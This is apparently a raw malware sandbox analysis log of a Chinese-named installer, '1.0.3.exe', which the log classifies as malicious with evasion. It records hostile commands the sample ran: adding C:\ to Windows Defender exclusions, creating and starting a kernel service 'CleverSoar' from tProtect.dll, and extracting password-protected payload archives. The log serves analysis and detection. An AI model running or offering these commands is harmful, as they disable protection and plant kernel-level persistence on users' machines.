Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeBinary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal92.evad.winEXE@137/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC55D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6CC55D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_007C9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007D3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_007D3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_007C9252
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC55240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6CC55240
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile created: C:\Program Files (x86)\Windows NT\is-51JMP.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4876:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6836:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1804:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5708:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4048:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4024:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6012:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3728:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6124:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeVirustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$2040C,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$1042A,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSection loaded: windows.storage.dllJump to behavior
